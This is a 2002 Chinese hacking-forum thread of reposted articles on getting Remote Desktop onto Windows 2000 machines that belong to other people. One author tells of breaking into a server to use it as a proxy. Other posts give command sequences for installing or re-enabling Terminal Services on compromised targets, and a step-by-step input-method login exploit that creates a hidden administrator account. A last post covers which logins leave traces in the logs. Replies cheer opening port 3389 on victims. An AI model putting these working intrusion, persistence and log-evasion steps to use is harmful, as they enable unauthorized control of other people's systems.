W2K Terminal Service 远程安装[推荐]

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

■ 回复数：19　◆ 点击数：740

将此页发给您的朋友

作者

主题: W2K Terminal Service 远程安装[推荐] ( 页: 1 2 )

回复 | 收藏 | 打印 | 篇末

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

发布者:Neil 来源:bbs.cnhonker.net 类别:原创天地日期:02-22 今日/总浏览: 11/1575

终端服务(TS)想必大家都不陌生了，早些时候闹得很火爆的“输入法漏洞”就是和TS相关的。但是本文和“漏洞”“入侵”什么的没什么关系。
由于我上 IRC 需要代理才能去（和Sunnet无关，是南京电信的问题），可现在 socks5 的代理很难找，于是前两天向一个朋友要了个代理用。本来也没什么的，和TS也挨不着边，只是，这个代理是朋友用 SSS 做的，到这大家都明白了，这个服务器自然有漏洞。终于，代理不知道给那个“高人”玩挂了。郁闷。花了N长时间找代理，未果。。。又怀念起这个代理（速度还不错），呵呵。虽然以前说不碰国内的主机。。。可是，还是IRC重要呀。于是，进入主机，得到权限，先用 SSS 做了 socks5，再用 sysocmgr 装了TS，从3389登录主机，晕倒！！！用户列表一堆，后门程序无数，最可笑的是，在 c:\ 下居然有 password dump、showpass等等等等，C盘和D盘装了2份流光2915和4.5的Sensor。。。再看看补丁情况，/me 吐血，都什么年代了，只打了SP2。于是，清理了一下主机，把一些垃圾去掉（至于流光，就留着吧，肯定有兄弟在用的，呵呵），最后，给它打了补丁。。。这一打可不要紧，重起服务器后，3389挂了。。。
再上去，卸载，再装，还是不行，晕。其实这个时候代理已经正常工作了，服务器的漏洞也补的差不多了，只是我不甘心。。。
于是，在自己机器上测试（我的补丁和给它打的是一样的），一样的结果，在命令行下用 sysocmgr 做无人职守进行安装的时候，弹出对话框，要求W2K的安装光盘，这在打 MS01-058 及安装 w2ksp2srp1 之前从来没发生过，反复折腾N遍，终于理清了这个安装需要哪些文件了，见下：

路径 : [光盘]\i386\

所需文件清单：

2001-08-22 08:00 221 BHP001.IN_
2001-08-22 08:00 265 BHP005.IN_
2001-08-22 08:00 453 BHP006.IN_
2001-08-22 08:00 765 BHP007.IN_
2001-08-22 08:00 679 BHP008.IN_
2001-08-22 08:00 353 BHP012.IN_
2001-08-22 08:00 183,733 BHP013.HL_
2001-08-22 08:00 725 BHP015.IN_
2001-08-22 08:00 299 BHP017.IN_
2001-08-22 08:00 261 BHP018.IN_
2001-08-22 08:00 343 BHP024.IN_
2001-08-22 08:00 967 BHSUPP.DL_
2001-08-22 08:00 494 DEFAULT.AD_
2001-08-22 08:00 271 DEFAULT.CF_
2001-08-22 08:00 257 DEFAULT.DF_
2001-08-22 08:00 7,920 HEXEDIT.DL_
2001-08-22 08:00 4,776 MCAST.DL_
2001-08-22 08:00 1,453 NETMON.IN_
2001-08-22 08:00 182,100 NETMON2.CH_
2001-08-22 08:00 4,337 NMSUPP.DL_
2001-08-22 08:00 12,409 PARSER.DL_
2001-08-22 08:00 2,685 PARSER.IN_
2001-08-22 08:00 20,479 SLBS.DL_

这个是 W2K ADV SERVER 的文件，对于这个安装，解压后的文件没用，必须要压缩格式的文件（奇怪），更可气的是，安装程序没有复制任何文件到系统里（除了TEMP目录，呵呵），在WINNT目录下有个文件叫 setupapi.log，从中也可以看出，对上述这些文件的复制全部失败（文件内容较多，我就不贴了），但安装却成功了。。。
只是，这个是从光盘上安装的，要远程安装，总不能电话通知管理员放光盘吧，于是把这些文件COPY到SYSTEM32目录下，再装，还是弹出对话框。。。由此确定系统中某处肯定保留了最初安装W2K时的安装路径，这个稍后再说。再在系统里仔细核对上述文件，并到 www.microsoft.com 去搜寻有关这些文件的信息，ft~~~~原来这些文件全部都是 Net Monitor 程序所需要的，而且系统中已经安装了这些文件了，可这和TS又有什么关系？MS 真是让人搞不懂。
言归正传，刚才说到初始安装路径，在系统中找了一会，果然在注册表中找到了，见下：

Root Key:
HKEY_LOCAL_MACHINE\

Subkey :
SOFTWARE\Microsoft\COM3\Setup
SOFTWARE\Microsoft\MSDTC\Setup
SOFTWARE\Microsoft\Transaction Server\Setup(OCM)
SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

KeyName:
SourcePath

KeyValue:
F:\SIMPCHIN\WIN2000\ADV_SRV\

注意：KeyValue 不包含“i386”，安装时会自动加上这个路径。

对于 sysocmgr 安装程序而言，所需要的是 SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
于是，在 D:\ 新建一目录为 i386 ，把上述文件COPY进去，再把这个注册表项的值改为 D:\，卸载TS，再安装TS，BinGO~~~~~~~~~~

本地成功了，那么远程能不能行呢？花了点时间，写了个Console下运行的修改注册表的东东，再下载了 arj.exe (DOS 下的压缩/解压缩程序，感谢 shadow 给我这个程序)，把上述文件打了个包，和arj.exe、cmdreg.exe(我写的那个东东，呵呵)都传上去，就象在本地一样，先建目录，解压文件到目录，保存原注册表值，改注册表，卸载，重起，再安装，再重起，最后，启动 mstsc ，连接远程 3389，hoho~~~~~~~~~~ HAPPY，才发现，一夜没睡了，不过很开心，呵呵。
最后，再简单说一下命令行下安装TS的过程，首先，要感谢 Nikinana，是他最早让我接触到了命令行下安装TS的过程，向他致敬

先在命令行下建立两个 answer file，如下：
echo [Components] > c:\aa
echo TSEnable = off >> c:\aa

echo [Components] > c:\bb
echo TSEnable = on >> c:\bb

注：文件 aa 是用来卸载TS的，文件 bb 是用来安装TS的，路径随意，只要和下述命令中的一致即可。

然后键入：
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\aa /q
重起完成后，键入
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bb /q

注：c:\winnt\.... 这个路径根据实际情况需更改，如果不希望立刻重起，在 /q 后加上 /r 参数。

参考文档：

1.(Q222444) :
http://support.microsoft.com/support/kb/articles/q222/4/44.asp

2.(Q230597) :
http://support.microsoft.com/support/kb/articles/Q230/5/97.ASP

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.14:05:57　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

哇，要写3389才能看懂？？/晕..........

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.14:15:52　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

　
　

计算机病毒每周预报(2002.03.25-03.31) 即时信息攻击的高潮国际上对病毒命名的惯例会感染PE型文件的新病毒W32/Gemi简介 Win2000/NT4.0进程操作导致本地权限提升漏洞 SQL Server 7.0/2000 缓冲区的大量溢出
　
在命令行下远程安装终端服务
　

--------------------------------------------------------------------------------
作者：coolweis

　　在目前windows2000的远程溢出不断被发现的今天，入侵win2000已经不是什么太困难的事情了，但是如何更好的利用和控制呢？介绍一个好方法：终端服务。但是很多机器没有安装终端服务，那么我就给它装一个。其实这是一个很简单的事情。你需要做的仅仅是打三行命令而已。这里有一个前提就是，你已经通过其他手段获得了该机器的管理员或系统权限。那么接下来我们要做的就是给他开个终端服务！

　　先讲一下思路，思路很简单，就是windows2000有无人职守安装的工具，sysocmgr.exe。下面看看MSDN里面关于这个工具的介绍：

How to Add or Remove Windows 2000 Components with Sysocmgr.exe

--------------------------------------------------------------------------------
The information in this article applies to:

Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
--------------------------------------------------------------------------------

SUMMARY
This article describes how to add or remove Windows 2000 components with the Sysocmgr.exe tool.

MORE INFORMATION
You can use the Sysocmgr.exe tool at a command prompt to add or remove Windows 2000 components. You can use the following command-line switches with Sysocmgr.exe:
/i

ath to Sysoc.inf file, where path to Sysoc.inf file is the full path to the Sysoc.inf file, for example:
c:\windows\inf\sysoc.inf
/u

ath to answer file, where path to answer file is the full path to the answer file that contains a list of items to add or remove.
/q - runs Sysocmgr.exe in quiet mode (without display pages)
/r - suppresses reboot (if needed)
NOTE: This procedure does not work and is unsupported with Microsoft Fax Service, COM+, and Distributed Transaction Coordinator. These are core components that are not removable.
The answer file can be any Windows 2000 answer file and only parses the [Components] and [NetOptionalComponents] sections. An example file is shown below:
[Components]
Netoc = on
Reminst = on
Paint = off
pinball = off
Solitaire = off

[NetOptionalComponents]
lpdsvc = 1
SimpTcp = 1
wins = 1

To start the installation or uninstallation of these components using Sysocmgr.exe, type the following command (file saved as c:\ocm.txt):
sysocmgr /i: %windir%\inf\sysoc.inf /u:c:\ocm.txt

For more information, please refer to the unattended documentation.

　　需要了解更多内容请参看无人职守文档。

　　我的思路就是利用这个工具进行无人职守安装，在安装过程中不需要交互，不显示窗口，安装完毕后不重新启动计算机（最好不要随便重新启动人家的机器，如果需要可以不选这一选项）。终端服务安装完毕后必须重新启动后才有效。可以根据情况处理。

　　下面是安装终端服务的具体做法。

　　首先，telnet到该机器上面（具体怎么样上去不需要我说了吧），然后在命令行下输入如下三行命令：
c:\>echo [Components] > c:\aa
c:\>echo TSEnable = on >>c:\aa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\aa /q /r

　　等待一段时间后这个sysocmgr运行完毕后就把这个终端服务装好了。但是现在还不能启动这个服务。如果不怕重新启动的化，完全可以去掉/r参数，重新启动后服务回自动启动。还可以通过更改注册表来改变终端服务监听的端口号。至于如何更改就不是本文所涉及的了，网上有很多命令行下修改注册表的工具。
　

--------------------------------------------------------------------------------

　

　

　

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.14:37:56　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

如何利用终端服务入侵远程计算机

by coolweis
coolweis@sina.com

用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。
恶意用户可以通过猜密码进入系统，更危险的是，如果这台机器存在输入法漏洞的话，那么入侵者
可以完全控制这台机器。
下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器：

首先我们确定某台机器的3389端口是开放的：
D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx

Starting nmapNT V. 2.53 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):
Port State Service
3389/tcp open msrdp
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds

D:\TOOLS\nmapNT\Nmapnt>

现在我们已经可以看到这台机器的终端服务是开放的，那么我们就可以开始行动了。
打开终端服务客户端，添上IP地址，选择连接。
稍等片刻，一般是很快的，就会出现熟悉的登陆对话框了，这是我们看看有没有输入法的漏洞。有关
输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢？经过多次的研究试验。
终于想出了一个办法。我们发现在跳至url后，我们双击winnt目录下的explorer.exe并没什么反应（是
机上已经运行了，可是我们为什么看不到结果呢？），如果我们不断的进行双击，或者什么也不做，一
会儿连接将被断开，在断开的一霎那，我们似乎看到了我们双击出来的窗口。经过几次试验，我们发现
不登陆进去是不行的，将会被服务端断开。于是想办法先登陆进去，我想到了在帮助中打开用户管理器，
经过试验，在跳至url中添入：mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm
在右侧会出现一个可以打开本地用户和组的管理器的链接，本来在正常情况下是可以打开这个管理器的，
可是在没有登陆进去的时候就是出不来，于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳
至url中输入：c:\winnt\system32，然后找到net.exe，右键点击net.exe，选择创建快捷方式，于是创建了
一个文件名为快捷方式net.lnk的文件，然后再右键点击这个快捷方式，选择属性，这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了，我们还是用net命令，因此不必改路径了，
添加个账号test的命令如下，C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中，
C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了，
关掉帮助窗口，用test账号登陆，密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
TSinternetuser账号加进administrators组中，设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下，如果能够登陆，就删掉刚刚建立的test账号。

这台机器就这样控制在我们的手里了。。。。。。

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.14:57:29　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

晕，每天来这，看到很多人问这问那，为何真正把他门要问的问题找来完整帖出，确没人看，看来多数人爱IPC空口令，MSSQL，SA：NULL，舍此，你能干嘛？？？？？？？？？

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.15:35:21　

IP: 已记录

不够坚强

级别：高级站友
威望：0
经验：0
货币：525
体力：

来源：其它
总发帖数：134
注册日期：2002-03-16

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

ttt

----------------------------------------------------------
因为有你，我无法坚强。

编辑　

删除　

发表于 2002-03-22.15:37:35　

IP: 已记录

死疯子

级别：高级站友
威望：0
经验：0
货币：545
体力：

来源：北湖村
总发帖数：118
注册日期：2002-03-20

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谢谢你！

----------------------------------------------------------
嘻嘻，昨天刮风又下雨，打雷又闪电！轰~~~~~一个不小心，疯人院的墙倒了！！于是我又一个不小心溜了出来。哇~~~~~~~~~外面的世界真是大呀，得玩个够再回去。

编辑　

删除　

发表于 2002-03-22.15:42:47　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

不用了，共免

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.15:46:52　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

标题：修改终端服务器的最大连接数
我要评论
发信人: Sinbad <MicroBin@263.net>
标题: 修改终端服务器的最大连接数
发信站: 辛巴达 (Wed Mar 13 11:17:12 2002)

1．明确终端服务的2种模式

----Windows 2000终端服务有2种运行模式: 远程管理模式和应用程序服务器模式。远程管理
模式允许系统管理员远程管理服务器，而且只允许2个终端会话同时登录终端服务器。应用程
序服务器模式允许用户运行一个以上应用程序，允许多个用户从终端登录访问服务器。但是
，应用终端服务的用户必须有终端服务授权，即必须在90天之内在这个域或工作组中设置终
端服务授权服务器，否则用户需删除应用程序，然后再重新安装。

2．解决“超过最大连接数”问题

----首先查看终端服务是运行在远程管理模式下还是在应用程序服务器模式下。如果在远程
管理模式下，只允许有3个同时连接的终端会话，如果超过3个连接，就会出现提示“超过最
大连接数”，此时，用户必须切换为应用程序服务器模式。具体操作过程如下。

----打开“控制面板”，双击“添加删除程序”，单击“添加删除Windows组件”*“组件”
，在Windows组件向导对话框中选中“终端服务” * “下一步” * “应用服务器” * “下
一步”，然后按照提示即可改变终端服务的模式。

--
※ 来源: http://sinbad.dhs.org

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.16:08:19　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

如何打开禁用的termservice(3389)补帖！

第一步，检查对方是否真的禁用了Terminal server

C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

仔细看 START_TYPE一项，显示对方该服务的启动模式为“DISABLED”也就是“禁用”。

第二步，更改对方终端服务的启动模式

C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto

[SC] ChangeServiceConfig SUCCESS

好了，现在我们已经把对方终端服务的启动模式修改成自动了。

第三步，再检查一便对方终端服务的启动模式（.abu.:呵呵，习惯问题）

C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS
sc
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

仔细看 START_TYPE一项，显示对方该服务的启动模式为“AUTO_START”也就是“自动”。

OK
第四步，启动对方的终端服务

C:\>sc \\xxx.xxx.xxx.xxx start termservice

SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530

C:\>sc \\xxx.xxx.xxx.xxx query termservice

SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
我用终端连，但连不上，我又C:\>sc \\xxx.xxx.xxx.xxx query termservice 却发现：SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : ?(这个我忘了） RUNNING_PENDING 状态成了这样了，我得怎么办呀，是不是要重启对方主机呀！！！
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.16:30:18　

IP: 已记录

秒差距

级别：长老级
威望：2
经验：0
货币：3597
体力：

来源：福建
总发帖数：1000
注册日期：2002-02-05

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

TTTT

----------------------------------------------------------
FGBCDFHIJCPQRFBSTJID

编辑　

删除　

发表于 2002-03-22.17:12:09　

IP: 已记录

傲气雄鹰

级别：本论坛版主
威望：0
经验：10
货币：3325
体力：

来源：云南昆明
总发帖数：1558
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

不错！现在很多人都喜欢3389

----------------------------------------------------------
本论坛不欢迎如下类型的帖子，此类帖子会被关闭或删除，本人恕不回复。
一，刀光雪影完全无关
二，无内容或内容过于简单，标题无意义的
三，个人联系的帖子。和标题为“某某请进”之类的
四，要求代破密码的
五，同一帖子多次重复的，灌水的
六，政治敏感话题，语言不文明，攻击他人的
七，溯雪手册中已有详细介绍或前面帖子中已有大量回复的

编辑　

删除　

发表于 2002-03-22.17:46:08　

IP: 已记录

kof2000 帅哥哦

级别：光明使者
威望：0
经验：4
货币：5218
体力：

来源：VisualStudio
总发帖数：2017
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

3389实在是方便啊！我一般都尽量打开对方的3389或者FTP

----------------------------------------------------------
VB/C/C++,网络安全技术...

编辑　

删除　

发表于 2002-03-22.17:54:08　

IP: 已记录

逆刃刀客

级别：老站友
威望：0
经验：0
货币：840
体力：

来源：dune
总发帖数：210
注册日期：2002-03-15

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

3389的安全问题呢?

----------------------------------------------------------
爱情就像我们看过的一场烟花,在绽放的瞬间是绝美的,但是,现在它熄灭了,夜空沉寂了,我们也就回家了,就是如此.
优雅地骂，文明地掐

编辑　

删除　

发表于 2002-03-22.18:08:57　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

关与修改服务端口3389的办法本站精华处有帖了，还有如果不能打补丁最简单的办法就是删掉HELP文件

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-22.20:21:13　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

也谈终端方式登录的日志记录

.abu.

　

最近看到一篇文章《分析进入Win2000后留下的足迹》，这文章里的关于纪录终端服务登录服务器日志

纪录的问题引发了几个朋友的讨论，究竟能不能纪录日志？何种情况下才能纪录日志？

顺手做了以下测试

　

这里先交待一下：

我的服务器名：ABUSERVER

我自己客户机名：ABUPC13

我自己客户机的IP：192.168.0.13

我登录所用的帐号：Administrator

本地安全策略里面开启：审核登录事件

　

测试一：

用终端服务的方式登录服务器，并正常注销退出，查看安全审核的日志记录如下：

　
登录成功:
用户名: Administrator
域: ABUSERVER

登录 ID: (0x0,0x1D0B52)
登录类型: 2
登录过程: User32
身份验证程序包: Negotiate
工作站名: ABUSERVER

　

　

　
用户注销:
用户名: Administrator
域: ABUSERVER

登录 ID: (0x0,0x1D0B52)
登录类型: 2

　

很奇怪吧，因为并没有看到有自己的IP或者机器名被记录下来。而且在登录时

纪录的工作站名: ABUSERVER （这不是服务器的名字嘛）

　

测试二：

正常登录上服务器以后，选择断开，临时中断当前会话，然后再次使用客户端连接上服务器，在安全日志里

出现了以下记录：

　
会话从 winstation 中断连接:
用户名: administrator
域: ABUSERVER
登录 ID: (0x0,0x1D0B52)
会话名称: Unknown
客户端名: ABUPC13
客户端地址: 192.168.0.13

　

　

　
会话被重新连接到 winstation:
用户名: administrator
域: ABUSERVER
登录 ID: (0x0,0x1BE7BA)
会话名称: RDP-Tcp#7
客户端名: ABUPC13
客户端地址: 192.168.0.13

　

　

这次，自己客户机名以及当时的IP都被记录下来了。

　

测试三：

正常连接服务器，输入错误的密码，再输入到第6次(缺省安全配置情况下）终端服务窗口关闭。

重新连接登录后，检查日志出现以下纪录：

在系统日志里：

来自客户端名 ABUPC13 的远程会话超出了所允许的失败登录最大次数。强行终止了会话。

在安全日志里：

　
登录失败:
原因: 用户名未知或密码错误
用户名: administrator
域: ABUSERVER
登录类型: 2
登录过程: User32
身份验证程序包: Negotiate
工作站名: ABUSERVER

　

　

到这里，我们分析了各种不同环境下登录终端服务器的日志纪录效果。

这样看来，是不是清楚了很多？呵呵

也许有朋友会奇怪为什么在第一个日志记录中，工作站名也是服务器的名称而不是我用来登录的客户机的名称。

原因是因为在以终端方式登录的时候，系统实际上是以虚拟桌面、本地登录的方式进行记录，自然没有对真正

用户的纪录咯。

　

所以总结如下：

1、当一个用户以终端方式登录服务器的时候，如果正常退出，服务器上的日志中，将不会记录你的IP，机器名。

2、当用户以终端方式登录后又发生了中断，这时候系统才会纪录客户机的IP以及机器名。

3、当密码输入错误导致连接终止时，在系统日志里会留下客户机的机器名信息。

　

呵呵，最后我在罗嗦一些关于被纪录下来的IP地址。

系统在纪录终端方式的客户机IP地址的时候，如果你的客户机处于一个局域网中，通过透明网关的方式访问服务器，

在服务器上留下的IP也只是你内网的IP地址，看来，单纯依靠微软的日志纪录，还是难免会有疏漏的。

解决的方法，这里就不多说了，可以参考shotgun曾经写过的关于《Win2000 Server入侵监测》一文。

　

　

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-03-23.11:33:52　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP [第 1 2 页]